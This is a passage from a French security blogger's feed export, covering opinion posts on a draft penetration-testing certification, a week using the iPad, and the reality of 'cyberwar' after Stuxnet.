align="justify"&gt;Non seulement il me semble difficile de mettre au point des codes d'exploitation sans pratiquer un minimum de &lt;i&gt;reverse engineering&lt;/i&gt; (passons là-dessus), mais surtout cela me semble tout à fait &lt;b&gt;coller avec ce texte&lt;/b&gt; (pour avoir fait l'expérience de la rigueur avec laquelle il était interprété par les instances de la SSI française):&lt;/div&gt;&lt;div align="justify"&gt;"&lt;i&gt;Le fait, sans motif légitime, d'importer, de détenir, d'offrir, de céder ou de mettre à disposition un équipement, un instrument, un programme informatique ou toute donnée conçus ou spécialement adaptés pour commettre une ou plusieurs des infractions prévues par les articles 323-1 à 323-3 est puni des peines prévues respectivement pour l'infraction elle-même ou pour l'infraction la plus sévèrement réprimée.&lt;/i&gt;"&lt;/div&gt;&lt;div align="justify"&gt;En clair, livrer à ses clients des &lt;i&gt;exploits&lt;/i&gt; "clé en main", c'est (probablement) &lt;b&gt;mal&lt;/b&gt;.&lt;/div&gt;&lt;h3&gt;Des chiffres et des lettres (et des couleurs, aussi)&lt;/h3&gt;&lt;div align="justify"&gt;Un dernier point qui me tient à cœur, c'est la caution officielle apportée aux &lt;b&gt;matrices de risque&lt;/b&gt;, &lt;b&gt;d'impact&lt;/b&gt;, etc. qui doivent enrichir et colorer&lt;a href="http:/#_ftn5_1423" name="_ftnref5_1423"&gt;[5]&lt;/a&gt; le rapport.&lt;/div&gt;&lt;div align="justify"&gt;Pour mémoire, ces matrices ont pour but:&lt;/div&gt;&lt;ul&gt;&lt;li&gt;     &lt;div align="justify"&gt;De lutter contre les consultants qui n'hésitent pas à faire mousser la production d'un outil automatique et brodent sur la dangerosité des "&lt;a href="http://www.nessus.org/plugins/index.php?view=single&amp;amp;id=10114"&gt;&lt;i&gt;ICMP Timestamp&lt;/i&gt;&lt;/a&gt;".&lt;/div&gt;&lt;/li&gt;&lt;li&gt;     &lt;div align="justify"&gt;D'en faire le moins possible après l'audit (c'est-à-dire d'économiser des sous), en supprimant toute action qui n'a pas été parée de rouge&lt;a href="http:/#_ftn6_1423" name="_ftnref6_1423"&gt;[6]&lt;/a&gt; dans le rapport.&lt;/div&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div align="justify"&gt;En ce qui me concerne, j'essaie de résoudre le problème à la source: la seule classification que j'utilise dans les rapports est &lt;a href="http://en.wikipedia.org/wiki/Pwn"&gt;&lt;i&gt;PWN&lt;/i&gt;&lt;/a&gt; ou &lt;i&gt;PAS PWN&lt;/i&gt;. Ce qui évite de ratiociner pendant des heures sur la criticité d'une faille sur une échelle de 0 à 4, 10 ou 20.&lt;/div&gt;&lt;h3&gt;En guise de conclusion&lt;/h3&gt;&lt;div align="justify"&gt;Il y a de bonnes idées dans ce document.&lt;/div&gt;&lt;div align="justify"&gt;Par exemple, il y est rappelé que le test d'intrusion ne prend tout son sens qu'en &lt;b&gt;complément d'un audit préalable&lt;/b&gt; du système (au sens large), d'abord dans le chapitre 2:&lt;/div&gt;&lt;div align="justify"&gt;"&lt;i&gt;Un test d'intrusion seul n'a pas vocation à être exhaustif. En revanche, il s'agit d'une activité qui peut être effectuée en complément des activités décrites dans les chapitres 2.1, 2.2, 2.3, 2.4 afin d'en améliorer l'efficacité (…)&lt;/i&gt;".&lt;/div&gt;&lt;div align="justify"&gt;… mais surtout en annexe B:&lt;/div&gt;&lt;div align="justify"&gt;"&lt;i&gt;En revanche, l'activité de test d'intrusion ne devrait jamais être réalisée seule et sans aucune autre activité d'audit.&lt;/i&gt;"&lt;/div&gt;&lt;div align="justify"&gt;Cette même annexe B rappelle que l'audit "&lt;a href="http://www.la-rache.com/"&gt;à l'arrache&lt;/a&gt;" d'un sous-système juste avant sa mise en production est &lt;b&gt;inefficace&lt;/b&gt;, voire &lt;b&gt;contre-productive&lt;/b&gt;:&lt;/div&gt;&lt;div align="justify"&gt;"&lt;i&gt;Les audits devraient être le plus exhaustif possible (…)&lt;/i&gt;".&lt;/div&gt;&lt;div align="justify"&gt;Personne ne me demande mon avis, mais puisque je suis sur mon blog, je vais le donner quand même :)&lt;/div&gt;&lt;div align="justify"&gt;Il me semble qu'une certification aussi ambitieuse, à destination essentiellement des grosses entreprises, va:&lt;/div&gt;&lt;ul&gt;&lt;li&gt;     &lt;div align="justify"&gt;Disqualifier tout un tas de &lt;b&gt;petits prestataires&lt;/b&gt; pourtant très compétents dans leur(s) domaine(s).&lt;/div&gt;&lt;/li&gt;&lt;li&gt;     &lt;div align="justify"&gt;Etre inapplicable en pratique, particulièrement dans la phase &lt;b&gt;d'évaluation des compétences&lt;/b&gt; (aussi bien collectives qu'individuelles).&lt;/div&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div align="justify"&gt;Enfin ce document continue à nier la &lt;b&gt;réalité de l'activité d'audit sécurité&lt;/b&gt;, ce dont &lt;a href="http://sid.rstack.org/blog/index.php/477-de-l-optimalite-de-la-legislation"&gt;Cédric s'est par ailleurs ému sur son blog&lt;/a&gt;, et ne règle pas le problème du &lt;i&gt;bootstrapping&lt;/i&gt; (comment former des auditeurs qualifiés alors qu'il faudrait une vie pour acquérir les compétences recommandées à titre individuel).&lt;/div&gt;&lt;div align="justify"&gt;Voici donc une proposition alternative:&lt;/div&gt;&lt;ul&gt;&lt;li&gt;     &lt;div align="justify"&gt;Faire du métier d'auditeur en sécurité une &lt;b&gt;profession réglementée&lt;/b&gt; (sur le modèle des notaires, des pharmaciens, des médecins, etc.).&lt;/div&gt;&lt;/li&gt;&lt;li&gt;     &lt;div align="justify"&gt;Certifier les personnes sur leurs compétences (un gynécologue n'est pas un urologue), en organisant de réelles &lt;b&gt;sessions d'examens&lt;/b&gt;. &lt;/div&gt;&lt;/li&gt;&lt;li&gt;     &lt;div align="justify"&gt;Exiger (éventuellement) un &lt;b&gt;renouvellement périodique&lt;/b&gt; de la certification.&lt;/div&gt;&lt;/li&gt;&lt;li&gt;     &lt;div align="justify"&gt;Créer une &lt;b&gt;instance représentative de la profession&lt;/b&gt;, qui collecterait tous les rapports d'audit, ce qui permettrait d'avoir un catalogue de produits audités un peu plus étoffé que celui de la &lt;a href="http://www.ssi.gouv.fr/site_article80.html"&gt;CSPN&lt;/a&gt;. Cette instance pourrait éventuellement servir d'interface avec les éditeurs logiciels, ou de tiers de confiance pour l'achat/revente de codes d'exploitation (missions qui ne sont pas actuellement dans les compétences du &lt;a href="http://www.certa.ssi.gouv.fr/"&gt;CERTA&lt;/a&gt;, sauf erreur de ma part).&lt;/div&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div align="justify"&gt;Les commentaires sont ouverts.&lt;/div&gt;&lt;hr align="left" size="1" width="33%" /&gt;&lt;a href="file:///C:/temp/#_ftnref1_1423" name="_ftn1_1423"&gt;&lt;span style="font-size: xx-small;"&gt;[1]&lt;/span&gt;&lt;/a&gt;&lt;span style="font-size: xx-small;"&gt; Comme celle du filtrage d'Internet diront les mauvaises langues.&lt;/span&gt;&lt;br /&gt;&lt;a href="file:///C:/temp/#_ftnref2_1423" name="_ftn2_1423"&gt;&lt;span style="font-size: xx-small;"&gt;[2]&lt;/span&gt;&lt;/a&gt;&lt;span style="font-size: xx-small;"&gt; HSC n'en est plus une depuis quelques temps.&lt;/span&gt;&lt;br /&gt;&lt;a href="file:///C:/temp/#_ftnref3_1423" name="_ftn3_1423"&gt;&lt;span style="font-size: xx-small;"&gt;[3]&lt;/span&gt;&lt;/a&gt;&lt;span style="font-size: xx-small;"&gt; Avec un "motif légitime" je suppose.&lt;/span&gt;&lt;br /&gt;&lt;a href="file:///C:/temp/#_ftnref4_1423" name="_ftn4_1423"&gt;&lt;span style="font-size: xx-small;"&gt;[4]&lt;/span&gt;&lt;/a&gt;&lt;span style="font-size: xx-small;"&gt; Curieusement, aucun candidat n'a été capable de reconnaitre une implémentation MD5 en assembleur MIPS à ce jour.&lt;/span&gt;&lt;br /&gt;&lt;a href="file:///C:/temp/#_ftnref5_1423" name="_ftn5_1423"&gt;&lt;span style="font-size: xx-small;"&gt;[5]&lt;/span&gt;&lt;/a&gt;&lt;span style="font-size: xx-small;"&gt; Sauf avec Latex, puisqu'on ne peut pas mettre de couleurs dans les tableaux.&lt;/span&gt;&lt;br /&gt;&lt;a href="file:///C:/temp/#_ftnref6_1423" name="_ftn6_1423"&gt;&lt;span style="font-size: xx-small;"&gt;[6]&lt;/span&gt;&lt;/a&gt;&lt;span style="font-size: xx-small;"&gt; Certains préfèrent le noir pour les failles critiques, les goûts et les couleurs …&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-8722508074991101260?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/8722508074991101260/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=8722508074991101260' title='14 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/8722508074991101260'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/8722508074991101260'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2011/05/le-diable-est-dans-les-details.html' title='Le diable est dans les détails'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>14</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-8944305028384553979</id><published>2011-01-31T08:00:00.012+01:00</published><updated>2011-01-31T08:00:12.047+01:00</updated><title type='text'>Une semaine avec l'iPad</title><content type='html'>&lt;div style="text-align: justify;"&gt;Il se trouve que j'ai récupéré par hasard un iPad, dans des circonstances qui ne peuvent s'expliciter qu'autour d'une bonne bière. N'ayant aucune attente particulière par rapport à cet objet - qui commence à fasciner et inquiéter les entreprises - je vais donc pouvoir en faire un compte-rendu dépassionné et objectif.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Pour commencer, l'engin est assez élégant, quoique pesant. On reconnait la qualité du design Apple, y compris en ce qui concerne l'emballage.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;La prise en main est bonne - il y a peu de chances de le laisser choir par inadvertance.&lt;/div&gt;&lt;h3&gt;Ce qui ne marche pas&lt;/h3&gt;&lt;div style="text-align: justify;"&gt;A l'usage, voici plusieurs lacunes qui apparaissent assez rapidement:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;ol&gt;&lt;li&gt;Tout d'abord, ça n'est pas l'objet ubiquiteux qu'on nous promet. J'ai un toujours un téléphone dans la poche, mais emporter son iPad demande une certaine planification (y a-t-il un vestiaire à destination, etc.). Et le sortir dans le métro pour lire son journal favori relève encore de la science-fiction.&lt;/li&gt;&lt;li&gt;C'est très cher à l'usage. Autant l'iPhone nous avait habitués à des applications gratuites (en version bridée, ou financée par la publicité), autant les applications iPad se destinent immédiatement à un public de gens "qui ont les moyens".&lt;/li&gt;&lt;li&gt;Même les applications gratuites font un usage intensif du "&lt;i&gt;in app purchase&lt;/i&gt;". Laisser ses enfants jouer avec l'iPad peut rapidement se transformer en drame. Le jeu "village des schtroumpfs" en est la caricature: tous les éléments du jeu sont payants. Si les enfants aiment la salsepareille, papa va devoir sortir l'oseille …&lt;/li&gt;&lt;li&gt;L'absence de multifenêtrage fait cruellement défaut quand on vient de la bureautique traditionnelle. Impossible de copier/coller rapidement un morceau de texte d'une application dans une autre: il faut suspendre la première application, ouvrir la deuxième, puis revenir à la première …&lt;/li&gt;&lt;li&gt;La communication avec le monde extérieur se limite au navigateur Web (impossible de brancher une clé USB par exemple). Du coup la suite d'applications Google devient rapidement indispensable pour entrer et sortir de l'engin (prendre des notes, sauvegarder des signets, etc.)&lt;/li&gt;&lt;li&gt;Impossible d'avoir confiance dans les applications disponibles sur l'App Store. Il existe bien des clients RDP et SSH gratuits par exemple, mais il faut réaliser un sérieux &lt;i&gt;background check&lt;/i&gt; sur l'éditeur avant de saisir son mot de passe &lt;i&gt;root&lt;/i&gt; dans une telle application.&lt;/li&gt;&lt;li&gt;Mon efficacité au clavier virtuel reste inférieure à celle d'un clavier réel, en particulier à cause de la séparation entre lettres, chiffres et signes de ponctuation dans trois claviers distincts. Autant dire que taper des lignes de commandes &lt;i&gt;shell&lt;/i&gt; avec un clavier virtuel relève de l'épreuve de nerfs. Les gens qui utilisent des mots de passe robustes prennent rapidement l'habitude de les mémoriser dans les applications ...&lt;/li&gt;&lt;li&gt;Il est impossible d'imprimer (par exemple un plan Mappy).&lt;/li&gt;&lt;/ol&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Maintenant il est clair que cet objet remplit parfaitement son rôle dans plusieurs domaines.&lt;/div&gt;&lt;h3&gt;Ce qui marche&lt;/h3&gt;&lt;div style="text-align: justify;"&gt;Sa supériorité sur un PC (et sa qualité principale à mon avis) c'est que … ça marche ! Grâce à la maitrise complète du matériel et du système d'exploitation par Apple, et au cloisonnement des applications tierces, plus besoin de se préoccuper d'une incompatibilité entre un antivirus et une protection logicielle par exemple …&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Sans parler des problèmes de drivers insurmontables sur PC (surtout depuis la cohabitation entre drivers Windows XP, drivers Windows Seven 32 bits, et drivers Windows Seven 64 bits - lorsqu'ils existent). Sur mon Dell E4300, même en installant la "suite de sécurité Trust Wave Embassy" livrée par Dell, je ne sais pas comment utiliser le lecteur d'empreinte digitale ou le lecteur RFID intégré. Quant au "hub de sécurité Broadcom", il contient des commandes cachées&lt;a href="file:///Z:/_DONE/Blog/#_ftn1_2961" name="_ftnref1_2961"&gt;[1]&lt;/a&gt;, et ne peut être reflashé officiellement que sous MS-DOS. De même pour la carte 3G intégrée&lt;a href="file:///Z:/_DONE/Blog/#_ftn2_2961" name="_ftnref2_2961"&gt;[2]&lt;/a&gt;, qui est horriblement instable par ailleurs.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Alors que sous iPad … tous les périphériques (WiFi, accéléromètre, etc.) fonctionnement &lt;i&gt;out of the box&lt;/i&gt; !&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;La gestion de l'énergie est également un point fort de l'appareil. Plusieurs jours d'autonomie en veille, plusieurs heures en fonctionnement, et surtout un allumage instantané.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;A contrario, sous Windows et encore plus sous Linux, la gestion de l'énergie a toujours été un problème insurmontable:&lt;/div&gt;&lt;br /&gt;&lt;ul&gt;&lt;li style="text-align: justify;"&gt;Autonomie ne dépassant pas les 4h quel que soit le matériel.&lt;/li&gt;&lt;li style="text-align: justify;"&gt;Charge erratique (Windows et Linux ne s'accordent pas sur la capacité et la performance de ma batterie).&lt;/li&gt;&lt;li style="text-align: justify;"&gt;Impossibilité de prévoir l'autonomie réelle lorsque la batterie se dégrade (ce qui arrive de plus en plus rapidement).&lt;/li&gt;&lt;li style="text-align: justify;"&gt;Modes de fonctions incompréhensibles (veille, veille hybride, hibernation) et ne fonctionnant pas toujours (selon le matériel ou le support du noyau).&lt;/li&gt;&lt;li style="text-align: justify;"&gt;Mise en veille ne fonctionnant pas à cause d'un &lt;i&gt;driver&lt;/i&gt; bogué.&lt;/li&gt;&lt;li style="text-align: justify;"&gt;Allumage intempestif de la machine (par exemple pour installer des correctifs de sécurité&lt;a href="file:///Z:/_DONE/Blog/#_ftn3_2961" name="_ftnref3_2961"&gt;[3]&lt;/a&gt;).&lt;/li&gt;&lt;li style="text-align: justify;"&gt;Et surtout … plusieurs secondes pour sortir de veille dans tous les cas.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Dès qu'il me faut consulter rapidement un article ou un plan, je sors désormais l'iPad - je sais que j'en ai pour moins de 5 secondes et que je peux m'interrompre à tout moment sans risquer de tout perdre.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Quant aux logiciels, on trouve par exemple des jeux de qualité tout à fait correcte pour moins de 10 euros. Disponibles immédiatement et sans problèmes de protections logicielles incompatibles.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Enfin l'écran tactile est un &lt;i&gt;must&lt;/i&gt; pour les jeunes enfants qui ne peuvent pas se servir d'un clavier et d'une souris. D'ailleurs les éditeurs ne s'y sont pas trompés et proposent de nombreuses applications pour les plus jeunes (livres interactifs, jeux, etc.). En 10 minutes, un enfant de 18 mois maitrise complètement l'interface graphique (y compris l'allumage et le déverrouillage) - il est autonome sur n'importe quel jeu (testé et approuvé).&lt;/div&gt;&lt;h3&gt;Conclusion&lt;/h3&gt;&lt;div style="text-align: justify;"&gt;En bref, l'iPad n'est pas cet engin révolutionnaire et indispensable qui vous est décrit par les &lt;i&gt;fanboys&lt;/i&gt; ayant fait la queue pour dépenser leurs 500€ (au bas mot et hors frais d'utilisation).&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Mais quand on manipule l'engin au quotidien, on réalise à quel point l'informatique "traditionnelle" s'est endormie dans un &lt;i&gt;statu quo&lt;/i&gt; frustrant pour les utilisateurs, qui ont pris l'habitude de travailler avec des systèmes contre-intuitifs, lents et difficiles à maintenir, alors que rien ne le justifie vu l'argent injecté chaque année dans l'industrie logicielle.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;C'est pourquoi je ne jetterais pas Chrome OS avec l'eau du bain comme le fait Gartner. En repensant les fondements de l'informatique (mais à quoi peut bien servir un BIOS en 2011 ?) et en s'appuyant sur les interfaces graphiques conviviales du Web 2.0, Google a une chance lui aussi de secouer le cocotier avec un produit un peu différent dans l'esprit (ne serait-ce que par son facteur de forme).&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Quant aux entreprises, il leur faudra bien renoncer un jour à leurs applications VB6 et IE6, sous peine de se retrouver avec une informatique tellement dépassée que la "&lt;i&gt;cloudification&lt;/i&gt;" massive (et tant redoutée) sera le fait des utilisateurs mécontents. Mais ceci est une autre histoire …&lt;/div&gt;&lt;br /&gt;&lt;span style="font-size: xx-small;"&gt;Billet rédigé avec &lt;/span&gt;&lt;a href="http://explore.live.com/windows-live-writer"&gt;&lt;span style="font-size: xx-small;"&gt;Windows Live Writer 2011&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;hr align="left" size="1" width="33%" /&gt;&lt;a href="file:///Z:/_DONE/Blog/#_ftnref1_2961" name="_ftn1_2961"&gt;[1]&lt;/a&gt; &lt;a href="http://natisbad.org/E4300/"&gt;http://natisbad.org/E4300/&lt;/a&gt;&lt;br /&gt;&lt;a href="file:///Z:/_DONE/Blog/#_ftnref2_2961" name="_ftn2_2961"&gt;[2]&lt;/a&gt; &lt;a href="http://natisbad.org/E4300/Dell_Wireless_5530_AT_cmd_ref.html"&gt;http://natisbad.org/E4300/Dell_Wireless_5530_AT_cmd_ref.html&lt;/a&gt;&lt;br /&gt;&lt;a href="file:///Z:/_DONE/Blog/#_ftnref3_2961" name="_ftn3_2961"&gt;[3]&lt;/a&gt; &lt;a href="http://www.nynaeve.net/?p=160"&gt;http://www.nynaeve.net/?p=160&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-8944305028384553979?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/8944305028384553979/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=8944305028384553979' title='16 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/8944305028384553979'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/8944305028384553979'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2011/01/une-semaine-avec-lipad.html' title='Une semaine avec l&apos;iPad'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>16</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-577689251725282424</id><published>2010-12-13T08:00:00.004+01:00</published><updated>2010-12-13T08:00:03.340+01:00</updated><title type='text'>CyberWar AfterMath</title><content type='html'>J'ai reçu un abondant courrier des lecteurs (ou plutôt un téléphone arabe des lecteurs devrais-je dire) autour de mon dernier billet, se résumant en gros à un déluge de critiques fondées sur ma prétendue illégitimité dans le domaine (pour simplifier).&lt;br /&gt;&lt;br /&gt;Il est vrai que je n'ai pas eu l'occasion de présenter dans des &lt;a href="http://www.academic-conferences.org/eciw/eciw2011/eciw11-biographies.htm"&gt;conférences spécialisées&lt;/a&gt;, ou de participer à des "cyber-exercices" (même si je vais me permettre de bloguer là-dessus prochainement).&lt;br /&gt;&lt;br /&gt;Mais puisque la première cyberguerre mondiale n'a pas encore eu lieu, il me semblait pourtant que mon opinion sur le sujet était tout aussi recevable que celle de n'importe qui - tout le monde en est réduit à des spéculations dans le domaine.&lt;br /&gt;&lt;br /&gt;J'oserais même penser qu'en tant que professionnel de l'informatique, mon opinion est plus qualifiée. Car si tout le monde peut intuiter la dangerosité d'une grenade ou d'une baïonnette sans jamais en avoir utilisé une, il en est autrement dans le domaine informatique où &lt;a href="http://sid.rstack.org/blog/index.php/194-de-l-utilite-des-analogies"&gt;aucune analogie avec le monde physique ne fonctionne&lt;/a&gt;. Les théoriciens de la cyberguerre n'ont pour la plupart aucune idée de ce qui se produit lorsqu'ils allument leur téléphone ou lorsqu'ils envoient un email. Ce qui les conduit à des conclusions absurdes, comme &lt;s&gt;HADOPI&lt;/s&gt; l'installation &lt;a href="http://www.securityfocus.com/brief/737"&gt;d'un bot contrôlé par le gouvernement américain&lt;/a&gt; sur le PC de tout bon citoyen, ou le &lt;a href="http://www.lemonde.fr/technologies/article/2009/04/07/un-projet-de-loi-autoriserait-obama-a-couper-des-pans-entiers-d-internet_1177880_651865.html"&gt;bouton rouge qui permet d'arrêter Internet&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Il en est ainsi des domaines techniques comme l'informatique ou la réparation de télé: personne ne peut avoir d'intuitions sans expérience. Le problème c'est qu'en informatique comme dans beaucoup de domaines de la vie courante (l'économie, la politique, etc.), absolument tout le monde a une solide opinion.&lt;br /&gt;&lt;br /&gt;La différence entre un professionnel de l'informatique et un technicien, voire un simple utilisateur, est la même qu'entre un prof de maths qui enseigne en prépa et un prof de collège. Le premier doit faire face constamment à des situations qui le poussent aux limites de ses capacités, tandis que le second rabâche à des ignorants des concepts à apprendre par cœur (ton mot de passe doit être complexe, tu ne dois pas le noter sur un post-it, tu dois utiliser un antivirus, etc.).&lt;br /&gt;&lt;br /&gt;Bien sûr, dans l'éducation nationale comme dans l'informatique, il existe de vrais passionnés à tous les niveaux, qui s'attaquent à des problèmes non résolus – le plus souvent sur leur temps libre.&lt;br /&gt;&lt;br /&gt;Malheureusement, au bout du compte, l'opinion majoritaire reflétée par les médias et couramment admise (même au plus haut niveau) est bien loin des réalités techniques les plus élémentaires. Si vous avez 30 minutes à perdre, et que vous voulez vous payer une bonne tranche de rigolade, je vous conseille de regarder un récent reportage intitulé "&lt;a href="http://www.telleestmatele.com/article-special-investigation-les-nouveaux-pirates-de-l-informatique-alerte-a-la-cyberguerre-57620747.html"&gt;les nouveaux pirates de l'informatique&lt;/a&gt;", suivi par "alerte à la cyberguerre". C'est disponible partout sur Internet, mais je ne peux pas vous donner de lien ici – seul Google a le privilège d'être au-dessus des lois.&lt;br /&gt;&lt;h3&gt;Revenons à nos moutons&lt;/h3&gt;Ce débat sur la cyberguerre est né de mes &lt;a href="http://news0ft.blogspot.com/2010/10/lechec-de-la-cyberguerre.html"&gt;réflexions sur StuxNet&lt;/a&gt;. Tout le monde s'extasie sur la "complexité" d'un tel code. Au gré des &lt;a href="http://www.cnis-mag.com/securite-du-cloud-attaques-scada-jeudi-28-octobre.html"&gt;conférences&lt;/a&gt; ou de mes &lt;a href="http://www.france24.com/fr/20101004-stuxnet-virus-informatiques-internet-maliciel-iran-chine-logiciel-symantec"&gt;lectures sur Internet&lt;/a&gt;, j'ai pu entendre que StuxNet représentait 9 mois*hommes de travail, ou 10 millions de dollars. Ces chiffres sont bien entendu totalement fantaisistes, puisque le pays d'origine du virus – et donc le salaire moyen des développeurs – reste inconnu :)&lt;br /&gt;&lt;br /&gt;On peut noter toutefois que la complexité d'un tel code est largement surestimée par les personnes qui ne sont pas des professionnels de l'informatique – tout comme un collégien va trouver la démonstration du grand théorème de Fermat incroyablement complexe, ce qui n'est pas forcément l'avis d'un professeur de prépa.&lt;br /&gt;&lt;br /&gt;Prenons le cas du laboratoire privé &lt;a href="http://esec-lab.sogeti.com/"&gt;Sogeti/ESEC&lt;/a&gt;. Malgré les fonds et les effectifs limités dont ils disposent, ils viennent pourtant de réimplémenter une &lt;a href="http://esec-lab.sogeti.com/dotclear/index.php?post/2010/11/21/Presentation-at-Hack.lu-:-Reversing-the-Broacom-NetExtreme-s-firmware"&gt;attaque sur des cartes réseau&lt;/a&gt;, dont &lt;a href="http://www.sstic.org/2010/presentation/Peut_on_faire_confiance_aux_cartes_reseau/"&gt;l'implémentation précédente&lt;/a&gt; était le fait d'un laboratoire de l'ANSSI. Est-ce à dire que "cinq gus dans un garage" peuvent rivaliser avec les services de l'état ? Je pense que oui (au facteur d'échelle près, les ressources de l'état étant illimitées), car la sécurité informatique est avant tout une affaire de matière grise – une ressource impossible à produire et difficile à capter.&lt;br /&gt;&lt;br /&gt;Les techniciens informatiques (et &lt;i&gt;a fortiori&lt;/i&gt; le grand public) sous-estiment les capacités des "vrais" &lt;i&gt;hackers&lt;/i&gt; de plusieurs ordres de magnitude. Un seul homme (ou femme :) vraiment compétent remplace aisément 10 à 100 informaticiens peu motivés comme on en rencontre presque partout. Les exemples de Google (ou de Free) sont là pour nous le rappeler.&lt;br /&gt;&lt;h3&gt;Pourquoi on ne voit rien … et ce qui se passe vraiment&lt;/h3&gt;Ce biais de perception provient essentiellement de la structuration du monde de la sécurité (aussi appelé le &lt;i&gt;&lt;a href="http://article.gmane.org/gmane.linux.kernel/706950"&gt;Security Circus&lt;/a&gt;&lt;/i&gt;).&lt;br /&gt;&lt;br /&gt;Il faut bien comprendre que toutes les publications (dans les magazines ou les conférences) sont intrinsèquement sans valeur: ce ne sont ni des résultats produits pour des clients, ni des attaques dangereuses ou illégales, ni des technologies revendables ou brevetables.&lt;br /&gt;&lt;br /&gt;Tout ce qui est réellement dangereux, parfois à la limite de la légalité, passe complètement en dessous du radar et "n'existe pas" pour la presse et le grand public en général. Et pourtant cette "masse manquante" représente l'essentiel des travaux produits par les professionnels de la sécurité dont l'activité présente suffisamment d'intérêt pour être financée (c'est-à-dire ceux qui en vivent d'une manière ou d'une autre).&lt;br /&gt;&lt;br /&gt;Vu de l'extérieur, ceci donne l'impression que ce petit monde ronronne gentiment, de sauteries en conférences, sans vraiment empêcher le &lt;i&gt;business&lt;/i&gt; de tourner rond. Ce qui est loin d'être représentatif de l'état de la menace aujourd'hui … &lt;br /&gt;&lt;br /&gt;En vérité, tous les systèmes connectés à Internet sont sous le feu permanent d'intrus (qu'on va appeler "&lt;i&gt;les chinois&lt;/i&gt;" pour simplifier – et c'est probablement d'ailleurs le cas). Suis-je mythomane ? Probablement pas, car j'ai eu l'occasion de les rencontrer "pour de vrai" à plusieurs reprises …&lt;br /&gt;&lt;br /&gt;La véritable cyberguerre a déjà commencé, mais elle ne ressemble pas à ce qu'on nous présente d'habitude (pays désorganisé, infrastructures critiques en panne, etc.). Pour cela, quelques centimètres de neige suffisent :)&lt;br /&gt;&lt;br /&gt;La véritable cyberguerre, c'est le pillage systématique de toutes les ressources technologiques occidentales par des individus entrainés, opiniâtres, et opérant en dehors de toute juridiction. Toutes les entités, des instances étatiques à la plus petite PME, sont victimes de ce ratissage systématique opéré par des attaquants qui ne connaissent pas le repos ni la compassion.&lt;br /&gt;&lt;br /&gt;Là où les cybergénéraux attendent des DDoS massifs, par analogie avec les bombardements bien connus dans le monde physique, le réel danger provient de la cinquième colonne qui a probablement infiltré tous les systèmes connectés à Internet à l'heure où j'écris ces lignes (&lt;a href="http://fr.wikipedia.org/wiki/Op%C3%A9ration_Aurora"&gt;l'opération Aurora&lt;/a&gt; n'étant que la partie émergée de l'iceberg).&lt;br /&gt;&lt;h3&gt;Une autre cyberguerre est possible&lt;/h3&gt;Ce qui se passe actuellement avec le site WikiLeaks me semble également relever de la cyberguerre, du moins de l'attaque non conventionnelle.&lt;br /&gt;&lt;br /&gt;En me gardant bien de me prononcer sur le fond, cet épisode met en évidence la dépendance très forte du "cybermonde" vis-à-vis d'entités commerciales américaines bien réelles (à savoir 